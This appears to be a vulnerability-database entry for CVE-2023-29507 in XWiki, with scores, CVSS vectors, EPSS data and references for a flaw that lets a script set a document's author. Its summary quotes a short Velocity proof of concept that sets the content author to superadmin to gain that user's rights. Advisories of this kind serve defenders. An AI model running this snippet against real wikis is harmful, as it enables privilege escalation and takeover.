Staging Environment: Content and features may be unstable or change without notice.
Search for vulnerabilities
Vulnerability details: VCID-ka4y-na7f-5kcc
Vulnerability ID VCID-ka4y-na7f-5kcc
Aliases CVE-2023-29507
GHSA-pwfv-3cvg-9m4c
Summary org.xwiki.platform:xwiki-platform-oldcore makes Incorrect Use of Privileged APIs with DocumentAuthors The Document script API returns directly a DocumentAuthors allowing to set any authors to the document, which in consequence can allow subsequent executions of scripts since this author is used for checking rights. Example of such attack: ``` {{velocity}} $doc.setContent('{{velocity}}$xcontext.context.authorReference{{/velocity}}') $doc.authors.setContentAuthor('xwiki:XWiki.superadmin') $doc.getRenderedContent() {{/velocity}}```
Status Published
Exploitability 0.5
Weighted Severity 9.0
Risk 4.5
Affected and Fixed Packages Package Details
Weaknesses (3)
CWE-648 Incorrect Use of Privileged APIs
CWE-937 OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
CWE-1035 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
System Score Found at
epss 0.0085 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.0085 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.0085 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.0085 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.0085 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.0085 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.0085 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.0085 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.0085 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.03251 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.09937 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.09937 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
epss 0.09937 https://api.first.org/data/v1/epss?cve=CVE-2023-29507
cvssv3.1_qr CRITICAL https://github.com/advisories/GHSA-pwfv-3cvg-9m4c
cvssv3.1 9.1 https://github.com/xwiki/xwiki-platform
generic_textual CRITICAL https://github.com/xwiki/xwiki-platform
cvssv3.1 9.1 https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
generic_textual CRITICAL https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
ssvc Track* https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
cvssv3.1 9.1 https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
cvssv3.1_qr CRITICAL https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
generic_textual CRITICAL https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
ssvc Track* https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
cvssv3.1 9.1 https://jira.xwiki.org/browse/XWIKI-20380
generic_textual CRITICAL https://jira.xwiki.org/browse/XWIKI-20380
ssvc Track* https://jira.xwiki.org/browse/XWIKI-20380
cvssv3.1 9.1 https://nvd.nist.gov/vuln/detail/CVE-2023-29507
generic_textual CRITICAL https://nvd.nist.gov/vuln/detail/CVE-2023-29507
Reference id Reference type URL
https://api.first.org/data/v1/epss?cve=CVE-2023-29507
https://github.com/xwiki/xwiki-platform
https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
https://jira.xwiki.org/browse/XWIKI-20380
CVE-2023-29507 https://nvd.nist.gov/vuln/detail/CVE-2023-29507
GHSA-pwfv-3cvg-9m4c https://github.com/advisories/GHSA-pwfv-3cvg-9m4c
GHSA-pwfv-3cvg-9m4c https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
No exploits are available.
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Found at https://github.com/xwiki/xwiki-platform
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Found at https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-02-06T16:59:40Z/ Found at https://github.com/xwiki/xwiki-platform/commit/905cdd7c421dbf8c565557cdc773ab1aa9028f83
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Found at https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-02-06T16:59:40Z/ Found at https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pwfv-3cvg-9m4c
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Found at https://jira.xwiki.org/browse/XWIKI-20380
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Vector: SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-02-06T16:59:40Z/ Found at https://jira.xwiki.org/browse/XWIKI-20380
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Found at https://nvd.nist.gov/vuln/detail/CVE-2023-29507
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none
Exploit Prediction Scoring System (EPSS)
Percentile 0.7483
EPSS Score 0.0085
Published At April 2, 2026, 12:55 p.m.
Date Actor Action Source VulnerableCode Version
2026-04-01T12:51:07.795149+00:00 GitLab Importer Import https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.xwiki.platform/xwiki-platform-oldcore/CVE-2023-29507.yml 38.0.0